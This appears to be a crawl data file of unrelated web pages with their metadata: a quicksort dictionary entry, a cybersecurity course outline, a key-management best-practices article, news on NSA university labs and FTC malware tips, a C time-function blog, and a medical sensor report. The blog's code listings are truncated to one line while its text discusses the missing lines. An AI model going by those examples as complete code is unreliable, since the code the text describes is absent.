Definition: Pick an element from the array (the pivot). Consider the first character (key) of the string (multikey). Partition the remaining elements into three sets: those whose corresponding character is less than, equal to, and greater than the pivot's character. Recursively sort the "less than" and "greater than" partitions on the same character. Recursively sort the "equal to" partition by the next character (key). Also known as three-way radix quicksort. Generalization (I am a kind of ...) Aggregate child (... is a part of or used in me.) Dutch national flag, key. See also postman's sort, quicksort, ternary search tree. Note: Especially good for strings. Fast Algorithms ... gives a good 3-way partition algorithm. Jon L. Bentley and Robert Sedgewick, Fast Algorithms for Sorting and Searching Strings, Proc. 8th Annual ACM-SIAM Symposium on Discrete Algorithms (SODA), pages 360-369, January 1997. If you have suggestions, corrections, or comments, please get in touch with Paul Black. Entry modified 30 December 2005. HTML page formatted Mon Feb 2 13:10:40 2015. Cite this as: Paul E. Black, "multikey Quicksort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 30 December 2005. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/multikeyQuicksort.html
<urn:uuid:e605dc95-cf5b-4a51-8b11-7de7e98ac110>
CC-MAIN-2017-04
http://www.darkridge.com/~jpr5/mirror/dads/HTML/multikeyQuicksort.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00324-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833246
356
2.9375
3
I130 Introduction to Cybersecurity An overview of Introduction to Cybersecurity. Professor Jean Camp Introduction to Cybersecurity is designed to provide undergraduate students with a 10,000 ft overview of both cybersecurity as a concept and an area of study. The course will provide an opportunity to hear not only the faculty but also the professionals who protect the Indiana University network. Participation does not require understanding more than the lecture; as there are no technical requirements for taking the course. The course is ideal for those students who are enrolled in Informatics or Computer Science; but it is also extremely accessible to those who are simply curious as to the risks they face on the network. The material will be targeted at a level appropriate for freshman, and clarifying questions are more than welcome. || class participation ||in class and on on-course participation are both counted. ||due every week In terms of participation both in the classroom and in the discussion area in On-Course are considered. If you are more comfortable speaking than writing, or more comfortable tin writing than speaking, you may choose only one. Participation should illustrate that any assigned reading has been complete. Participation that is not professional in manner will not be counted as a positive contribution. In terms of the weekly writing, each week there is a 150 word commentary on the lecture. The commentary may be a summary, or a comment, or you may ask a question, or you may connect the lecture to some current event. The commentary must illustrate awareness (to be passable) and understanding (to be excellent) of the lecture materials. This course introduces students to Security. The course will primarily focus on introduction to three core areas (technical aspects of security, organizational aspects of security and legal aspects of security). Through examples of security problems in real life, this course will illuminate fundamental ideas and concepts of information security. October 25: The Course in a Nutshell Professor Jean Camp Introduction to the basic concepts of security. Introduction to the faculty, grading and class organization. November 1: Your Privacy and Security Bob Konicek, Network Administrator As you use the computers and networks in Informatics, what does the school learn about you? Does this align with your expectations? November 8: Security Protocols Markus Jakobsson, Associate Professor, Informatics and Computer Science. Protocols define the syntax and semantics of communication between devices. That is security protocols can be seen as games. Understanding security means understanding the rules and breaking security allows you to cheat. November 15: Security in Practice Mark Bruhn, Chief IT Security and Policy Officer, IU. Security in theory is different from in practice. What does it mean to secure a network? How do network managers view security, and what are the real-world threats likely to be faced by security managers. November 22:Thanksgiving Day recess Thanksgiving Day recess November 29: Malware on the Network Raquel Hill, Assistant Professor, Informatics and Computer Science. Connectivity is exposure. Network risks include denial of service, masquerade attacks, and directing hacking assaults. This session will focus on understanding the threats created on and in the network. December 6: Malware in Peer to Peer Networks Minaxi Gupta, Assistant Professor of Computer Science. Security is based on concepts of transactions, log-in and specified roles. P2P can violate all those assumptions. What risk are you taking when you download your music.
<urn:uuid:ae8adf75-3c34-478f-8722-b1529ca72d1a>
CC-MAIN-2017-04
http://www.ljean.com/classes/06_07/I130/Prospectus_130.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00534-ip-10-171-10-70.ec2.internal.warc.gz
en
0.920481
712
2.71875
3
Data encryption and key management in the real world Best practices dictate that we must protect sensitive data at the point of capture, as it’s transferred over the network (including internal networks) and when it is at rest. Protecting data only sometimes – such as sending sensitive information over wireless devices over the Internet or within your corporate network as clear text – defeats the point of encrypting information in the database. It’s far too easy for information to be intercepted in its travels so the sooner the encryption of data occurs, the more secure the environment will be. A comprehensive encryption solution doesn’t complicate authorized access to the protected information – decryption of the data can occur at any point throughout the data flow wherever there is a need for access. Decryption can usually be done in an application-transparent way with minimum impact to the operational environment. Due to distributed business logic in application and database environments, organizations must be able to encrypt and decrypt data at different points in the network and at different system layers, including the database layer. Encryption performed by the database management system can protect data at rest, but more security oriented corporations will also require protection for data while it’s moving between applications, databases and data stores. One option for accomplishing this protection is to selectively parse data after the secure communication is terminated and encrypt sensitive data elements at a very granular level (usernames, passwords, etc.). Application-layer encryption and mature database-layer encryption solutions allow enterprises to selectively encrypt granular data into a format that can easily be passed between applications and databases without changing the data. Key management is often overlooked One of the essential components of encryption that is often overlooked is key management – the way cryptographic keys are generated and managed throughout their life. Since cryptography is based on keys which encrypt and decrypt data, your database protection solution is only as good as the protection of those keys. Security depends on several factors including where the keys are stored and who has access to them. When evaluating a data privacy solution, it is essential to include the ability to securely generate and manage keys. This can be achieved by centralizing all key management tasks on a single platform, and effectively automating administrative key management tasks, providing both operational efficiency and reduced management costs. Data privacy solutions should also include an automated and secure mechanism for key rotation, replication, and backup. The difficulty of key distribution, storage, and disposal has limited the wide-scale usability of many cryptographic products in the past. Automated key distribution is challenging because it is difficult to keep the keys secure while they are distributed, but this approach is finally becoming secure and more widely used. Standards for key-management have been developed by the government and by organizations such as ISO, ANSI, and the American Banking Organization (ABA). The key management process should be based on a policy. This article will exemplify different elements of a suggested policy for a Key Management System used for managing the encryption keys that protect secret and confidential data in an organization. Issues with native point solutions A major problem with encryption as a security method is that the distribution, storage, and eventual disposal of keys introduce an expensive and onerous administrative burden. Historically, cryptographic keys were delivered by escorted couriers carrying keys or key books in secure boxes. An organization must follow strictly enforced procedures for protecting and monitoring the use of the key, and there must be a way to change keys. Even with all of these restrictions, there is always a chance that the key will be compromised or stolen. Even if there are standards developed for key-management it is still the most difficult part of an encryption solution. This is one of the greater challenges to overcome when you decide to create your own solution based on encryption toolkits from database vendors and security vendors. These toolkits provide the basic functionality for encrypting and decrypting information but typically do not provide a secure key-management system. Many companies have tried to develop their own encryption functionality, but few have succeeded in creating a system that performs not only by doing the obvious encryption, but doing so in a secure and reliable manner that does not prohibit you from keeping your systems operational. A mature data protection system should be based on a sophisticated key management system that is transparent, automated, secure and reliable for the environments where it operates. A distributed approach with a central point of control A mature data protection system should provide a central point of control for data protection systems at the application, database and file levels. The encryption solution has a combined hardware and software key management architecture which combine the benefits of each technology. This will address the central security requirements while providing the flexibility to allow security professionals to deploy encryption at the appropriate place in their infrastructure. It provides advanced security and usability smooth and efficient implementation into today’s complex data storage infrastructures. If your human resources department locks employee records in filing cabinets where one person is ultimately responsible for the keys, shouldn’t similar precautions be taken to protect this same information in its electronic format? One easy solution is to store the keys in a restricted database table or file. But, all administrators with privileged access could also access these keys, decrypt any data within your system, and then cover their tracks. Your database security in such a situation is based not on industry best practice, but on trusting your employees. When securing the sensitive data within your organization trust is not a policy. The key custodian should be a role in the IT organization. The key custodian The key custodian is responsible for managing the multi-layer key management infrastructure, including the creation of keys, distribution of replacement keys and the deletion of keys that have been compromised. The custodian should be appointed by the Compliance Review Committee. Access to central key management functions should require a separate and optional strong authentication and management of encryption keys should be logged in an evidence-quality audit system. Keys stored in the Hardware Security Module are protected from physical attacks and cannot be compromised even by stealing the Hardware Security Module itself. Any attempt to tamper with or probe the Hardware Security Module will result in the immediate destruction of all private key data, making it virtually impossible for either external or internal hackers to access this vital information. Encryption of the application data should be performed by an Enforcement Agent that should be implemented as a Dedicated Encryption Service (Please see my article in (IN)SECURE Issue 8) that is separated from the administration of the data that it protects. This service may run in different environments including in a separate process, a separate server or in a Hardware Security Module depending on the security class of the data and the operational requirements for performance and availability. Key domains for protection and easier management A mature data encryption solution should support the concept of key domains which can isolate different systems for security reasons or operational needs. Each key domain may have different security exposures and can have a different policy for how keys should be managed including key generation, key rotation and protection of key material. It should support transparent re-encryption of the data when it flows between systems that are using different encryption keys or different algorithms. The Key Management System must support multiple levels of keys to ensure that the encryption keys that protect secret and confidential data cannot be compromised. This enables the use of different encryption keys for different columns, tables and files. When setting policy, it is important to configure the use of different encryption keys and initialization vectors across different columns, tables and files to maintain compartmentalization and a diverse front against attack. The Keys should be stored in an Enforcement Agent that supports dual control (requiring more than a single administrator/operator) for key recovery. It may be implemented in hardware or software, but it must support both the encryption and integrity of the key backup format. Annual review of algorithms and key lengths The Key Management System must support key length or strength of 128-bits or greater for symmetric keys. Such keys are deemed “strong encryption” and are not susceptible to a brute force attack using current technology. Public or asymmetric keys must be of equivalent strength. That is, a 128-bit symmetric key and 3072-bit public key are considered to be equivalent in terms of strength, while a 15,360-bit public key is equivalent to a 256-bit symmetric key. The data encryption should be performed with strong standard algorithms including 3DES, AES 128 or AES 256. Data requiring protection for longer periods of time should use the longer key lengths. Note that adequate CPU power today may not be enough tomorrow as you incorporate more secure communications. It is wise to establish a key-length policy early and review it annually. Secure generation and distribution of keys The Key Management System must generate a unique key for each file, tape, or other data element that needs to be encrypted. Private keys must be generated within the secure confines of the Key Management System and never be transferred outside the Key Management System unless encrypted with a Key Encryption Key. All keys should be centrally generated in software or hardware based on the security class for the type of data they protect. The key management system must be able to electronically transfer private keys to other trusted key repositories throughout the enterprise. This may also be implemented via Smart Cards. The security policy should define where different keys should be stored and cached. The master keys are used to encrypt all operational keys that should be stored in cipher text in separated databases. Security metadata and operational encryption keys should be kept in cipher text (even when stored in memory) until needed for use by crypto-services routines. All communication both external and internal is encrypted. All Data Protection System services should be using X.509 certificates and SSL for secure distribution of encryption keys. Unique keys should be generated for each Enforcement Agent, and should be used when sending information between system components. The data encryption method should be based on different encryption keys for different columns, tables, files and directories. An optimal design for Hardware Security Module support can be based on an optimal combination of hardware and software keys. Supported Hardware Security Module should be tamper evident and compliant with FIPS PUB 140-2 Level 3 Security Requirements for Cryptographic Modules, and keys are randomly generated in compliance with ANS X9.24 Section 7.4. Key validation, access control and logging Key validation is performed by integrity checking the security metadata that is kept in ciphered text (even in memory). Key access control is performed by role-based authorization of users, allowing for specific authorized actions by user (select/insert/update/delete). Users can be authenticated by any accepted means of the native database. Any encrypt/decrypt operation requested by the user is verified against the policy by the Enforcement Agent after authorization and authentication checks have been completed by the database. Under the control of the authenticated Security Administrator, the system should generate a Master Key used to encrypt all operational keys. Security data remains ciphered until needed for use by crypto-services routines. The master keys and data encryption keys should be secured, and their integrity checked. All communication, external and internal, should be encrypted. The system may use public key cryptography to exchange the symmetric encryption keys. The Key Management System must support tracking of; when keys are created and deleted; who created and deleted them; who used what keys; and what was done with the key. Key protection and aging Encryption keys should be protected and encrypted when stored in memory or databases, and during transport between systems and system processes. The use of a combination of software cryptography and specialized cryptographic chipsets, called a Hardware Security Module, can provide a selective added level of protection, and help to balance security, cost, and performance needs. Certain fields in a database require a stronger level of encryption, and a higher level of protection for associated encryption keys. Encryption keys and security metadata should continuously be encrypted and integrity validated – even when communicated between processes, stored or cached in memory. Security data should remain ciphered until needed for use by crypto-services routines. Key Rotation, or more accurately Key Aging, is best security practices and required in some governmental regulations and industry initiatives. More sensitive data and data more exposed systems should be re-encrypted with fresh encryption keys more frequently than the rest of the data. A well designed automated key rotation solution can provide zero down-time by attaching key labels to each record or data field in the operation databases and file systems. The Automated key rotation process can run in background and utilize spare cycles on each available processor on your data servers. The background processing can be assigned a priority level that will complete the key rotation according to the policy that is defined. Secure key storage To maintain a high level of security the end-point server platform should provide the choice to only temporarily cache encrypted lower level data encryption keys. Key encryption keys should always be stored encrypted on separated platforms. A central server with a hardened standard computing platform to store the keys can provide a cost effective solution. Keys should be kept in an encrypted format in memory (cached) until they are to be used. Data encryption keys should be stored in encrypted format in a separate data server along with other policy information, optionally on the Security Administration System repository or on the local database where the Enforcement Agent is installed, depending on the operational requirements and security level of the data that is protected. All keys except the Master Key should be stored (encrypted) under the Key Encryption Keys. The Master Key should also be protected while in transient storage or be kept inside the Hardware Security Module storage, depending on the operational requirements and security level of the data that is protected by the keys. Effective protection of memory cached keys Memory attacks may be theoretical, but cryptographic keys, unlike most other data in a computer memory, are random. Looking through memory structures for random data is very likely to reveal key material. Well made libraries for use as Native Encryption Services go to great efforts to protect keys even in memory. Key-encryption keys are used to encrypt the key while it is in memory and then the encrypted key is split into several parts and spread throughout the memory space. Decoy structures may be created to mimic valid key material. Memory holding the key is quickly zeroed as soon as the cryptographic operation is finished. These techniques reduce the risk of memory attacks. Separate encryption keys should be used for different data. These encryption keys can be automatically rotated based on the sensitivity of the protected data. A Dedicated Encryption Systems can provide separation between processes or servers dedicated to encryption operations but they are also vulnerable to memory attacks. However, a well made Dedicated Encryption System runs only the minimal number of services. Since web servers, application servers, and databases have no place on a dedicated cryptographic engine, these common attack points are not a threat. This severely constrained attack surface makes it much more difficult to gain the access needed to launch a memory attack. The security classification of the protected data will help in deciding a topology that will give the right balance between security, performance and scalability for each type of environment within an organization. Key backup and recovery A weak link in the security of many networks is the backup process. Often, private keys and certificates are archived unprotected along with configuration data from the backend servers. The backup key file may be stored in clear text or protected only by an administrative password. This password is often chosen poorly and/or shared between operators. To take advantage of this weak protection mechanism, hackers can simply launch a dictionary attack (a series of educated guesses based on dictionary words) to obtain private keys. To maintain a high level of security and separation the application data backup files should be separated from the backup of encrypted lower level data encryption keys. After keys are created, they must be archived to a secure storage environment where they can be kept for long periods of time. Master keys should be backed up separately. During installation, the master key should be generated and stored on removable media for recovery purposes. Maintaining this media in escrow and/or at your disaster recovery site is best practice. Backup of keys on the Security Administration System should be performed on a regular basis, usually before and after major policy changes are realized. Backup of the encrypted data encryption keys should be automated and performed at the same time as business data backup, using standard database backup and restore procedures. Even if policies or keys have changed, or if the Security Administration System is unavailable, any Enforcement Agent and its protected database may be restored successfully as long as access to the Master Key is provided via proper user authentication. The Key Management System must be able to survive multiple hardware and site failures and still be able to retrieve the archived keys to unlock encrypted data. The Key Management System must support creation and management of “split keys,” so that the ability to decrypt data requires cooperation of multiple persons, each knowing only their part of the key, to reconstruct the whole key. We have reviewed crucial guidelines and best practices for a Key Management System for data encryption based on the approach of a central point of control for key management and distributed encryption and policy enforcement across applications, databases and file systems. The solution provides great flexibility by combining the benefits from hardware and software based encryption and key management. This approach addresses the requirements for central security control while providing the flexibility to allow security professionals to deploy encryption at the appropriate place in their infrastructure. It provides the needed balance between advanced security, availability, and performance for the combined solution. The concept of separate key domains across a data flow can isolate different systems from a risk perspective and it can also accommodate for differences in the operational requirements. Best practices dictate that we must protect sensitive data at the point of capture, as it’s transferred also over internal networks and when it is at rest. A mature solution for encryption and key management can provide this higher level of protection of information.
<urn:uuid:d0684861-ae53-4a4f-9d9d-2fbd5d107145>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2007/12/10/key-management-for-enterprise-data-encryption/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.60/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922789
3,605
3
3
College students can probably learn a thing or two about security from the National Security Agency, right? The NSA hopes so, as it is funding small labs dubbed "lablets" at research universities that will focus on the Science of Security. Carnegie Mellon University, North Carolina State University, the University of Illinois Urbana-Champaign and the University of Maryland have received millions in grants for the project. + ALSO on Network World: The NSA's Weird Alphabet Soup of code names for secret spy programs and hacker tools + “All of the work is basic science, without any publication restrictions,” says William Scherlis, professor and director of the Institute for Software Research -- and of the security lablet -- at Carnegie Mellon. “The point of all this is to build a network of SoS thinking.” This combines computer science, software engineering, behavioral science and economics, and addresses questions in areas such as scalability and human behavior. The University of Maryland has received $4.5 million over three years to establish its lablet. "Much of the existing work in cybersecurity is reactive, and focuses on designing 'point solutions' to specific problems," says Jonathan Katz, director of the Maryland Cybersecurity Center(MC2) and lead principal investigator of the lablet. "Our goal is to establish mathematical models that can be used to address cybersecurity threats more broadly, and to carry out empirical studies that can help validate those models."
<urn:uuid:b207becf-1293-4d24-b1fa-69c462bc5c2d>
CC-MAIN-2017-04
http://www.networkworld.com/article/2226895/security/how-adorable--nsa-hatches--lablets--at-4-universities.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00122-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937269
299
2.609375
3
Criminals are hard at work thinking up creative ways to get malware on your computer, warns the Federal Trade Commission. With appealing Web sites, desirable downloads, and compelling stories, these criminals try to lure consumers to links that will download malware, especially on computers that don't use adequate security software. Then, they use the malware -- malicious software -- to steal personal information, send spam, and commit fraud. A new publication from the FTC has information that could help consumers protect their computers against malware and reclaim their computer and electronic information if malware is already on their computer. The publication, "Minimizing the Effects of Malware," provides tips on spotting malware, and urges consumers to act immediately if they suspect their computer is affected by malware. More information is available through OnGuardOnline.gov, a multimedia, interactive consumer education campaign launched by the FTC and a partnership of other federal agencies and the technology industry. The comprehensive Web site has tips, articles, videos, and interactive activities. The quizzes and information on OnGuardOnline.gov can be downloaded by companies and other organizations to use in their own computer security programs. OnGuardOnline.gov and the Spanish-language version, AlertaenLinea.gov, have logged more than five million unique visits since they were launched on September 27, 2005.
<urn:uuid:3582cf50-2f02-4b00-8b27-a35380c08c8e>
CC-MAIN-2017-04
http://www.govtech.com/security/FTC-Offers-Information-on-Protecting-Reclaiming.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00242-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937457
266
2.875
3
Beware the trap of time functions RoyHu 270003S1XN Visits (2555) Blog author: Kewen lin ( link Translator: Roy Hu When we develop applications in the C programming language, we often use C time library functions, such as time, localtime, ctime, mktime, and asctime, to get or print out time-related information. But you might not notice some interesting phenomenon. Let's first take a look at the following example: 1 #include <stdio.h> Before checking the output of this program, let's consider the following questions: (1) What are the relationships among the values of the structure variables tm_1, tm_2, and tm_3 on line 22? (2) On line 23-26, is the time of tm_2 really three seconds later than that of tm_1? Now, let's take a look at the output of the code above: Is the result the same as what you expected? Actually, tm_1, tm_2 and tm_3 on line 22 point to the same location. In the implementation of the localtime function, a static internal struct tm structure is used to store corresponding time information. Each time the localtime function is invoked, the internal struct tm structure will be modified. That is, this structure stores only the latest invocation result. Therefore, the localtime function returns the same struct tm structure each time. It means that the subsequent invocation of the asctime function on line 23-25 actually pass the same structure (i.e. the pointer that points to the same location). As a result, it is no wonder that they print out the same time. Let's take a look at another code example: 1 #include <stdio.h> The code on line 1-28 is the same as the first code example, so let's focus on the rest of this code example. Since the localtime function returns the same internal static structure address, you might want to assign it to a local structure. By doing so, the previous value of the localtime function can be stored, and will not be overwritten by a subsequent invocation, as shown by line 35-36. Then, you might wonder: Will the time of tm_4 and tm_5 printed out by line 41 be the same as the result printed out by line 44-45? Let's take a look at the output of PARTII: Is the output the same as what you expected? To our surprise, the time strings of tm_4 and tm_5 printed by line 41 are the same. However, we know that tm_4 and tm_5 are different time structures, by printing out the address of the tm_4 and tm_5 structures and their corresponding second number(tm.sec). Actually, the problem is caused by the asctime function. By printing out the returned pointer addresses after the asctime function call tm_4 and tm-5, we find that the returned addresses are the same. Judging from the behavior of the asctime function, we can tell that its internal implementation is actually similar to that of the localtime function, which also uses an internal static character array to store converted time strings. Each time the asctime function is invoked, this string will be modified, and this function will return the same address, the address of the internal static character array. Let's analyze what line 41 does: 1) Call asctime(&tm_4), update the internal static character array based on tm_4, and return the address the character array; 2) Call asctime(&tm_5), update the internal static character array based on tm_5, and return the address of the character array. In this step, the new tm_5 information will overwrite the original tm_4 information. 3) Print out the string that is pointed to by the first argument (i.e. the internal static character array). At this time, this string has been updated with the information of tm_5. Then it prints out the time information of tm_5. 4) Print out the string that is pointed to by the second argument (i.e. the time of tm_5). On line 44, we print out the time information of tm_4 immediately after calling the asctime function. Similarly to what we do with the localtime function, we can use local character array to store the result of calling the asctime function. Then, the result will avoid being written by a subsequent function invocation. According to the POSIX standard, time functions, such as asctime(), ctime(), gmtime(), and localtime(), return internal static object, either a struct tm structure or character array. Therefore, we should be very cautious when calling these functions. If you do not need to store the invocation result, you can print it out in time; otherwise, you can use a local structure to store it temporarily. For details about the asctime function, visit the topic at http For details about the localtime function, visit the topic at http
<urn:uuid:d3c8d012-a9cc-4176-8b94-90f348e174b1>
CC-MAIN-2017-04
https://www.ibm.com/developerworks/community/blogs/5894415f-be62-4bc0-81c5-3956e82276f3/entry/beware_the_trap_of_time_functions?lang=en
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00150-ip-10-171-10-70.ec2.internal.warc.gz
en
0.877855
1,103
2.828125
3
Wireless Implant Monitors AneurysmsBy M.L. Baker | Posted 12-12-2005 On Monday, the Michael E. DeBakey VA Medical Center announced that it had implanted the Endosure sensor in patients who were receiving stents to protect against aortic aneurysms. The sensor, approved by the FDA last month, promises a more effective, cheaper and safer way to make sure the stents are working. Aneurysms occur when a weakened area of an artery gives way, creating a bulge. This is most likely to happen in the abdominal aorta, just under the kidneys. Abdominal aortic aneurysms are the third leading cause of sudden death in elderly U.S. men and the 13th leading cause of death in the United States. The device, made by CardioMEMS Inc., is implanted in the aneurysm sac. When activated by an external device, it transmits information about pressure inside the aneurysm. According to Division of Vascular Surgery and Endovascular Therapy of Emory University, which tested the sensor, aneurysms are typically repaired by inserting a stent into the affected blood vessel. This takes the pressure off the aneurysm by creating a new route for blood to flow. But since the stents can leak and cause the aneurysm to rupture, they require regular check-ups. The sensor, which is implanted into the aneurysm sac, provides a new way to monitor the pressure. Instead of expensive CT (computed tomography) scans every six or 12 months, physicians can place an antennas over a patients' abdomen to make sure that the stent is still holding up; sensor information is converted to a pressure wave form and displayed on a screen. Besides the expense, CT scans are also problematic because they can fail to detect small leaks and require contrast dye and radiation that might harm patients, said Ruth Bush, MEDVAMC vascular surgeon. "Because this cutting-edge device is inside the aneurysm, it can give us information we never had before. We are now able to monitor pressure changes and receive important feedback regarding the stent graft's ability to appropriately seal off the aneurysm from systemic circulation. This system provides an opportunity for us to know whether the aneurysm is truly protected against rupture after endovascular repair," said Wei Zhou, M.D., MEDVAMC vascular surgeon. According to its producer, CardioMEMS Inc., the device is the first wireless, permanently implantable pressure sensor to become commercially available in the United States. It received FDA approval after testing in 100 patients in Brazil, Argentina and Canada and at nine hospitals in the United States.
<urn:uuid:fdea3a7b-0efa-4a16-a525-f80badc61723>
CC-MAIN-2017-04
http://www.cioinsight.com/print/c/a/Health-Care/Wireless-Implant-Monitors-Aneurysms
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00544-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943834
578
2.703125
3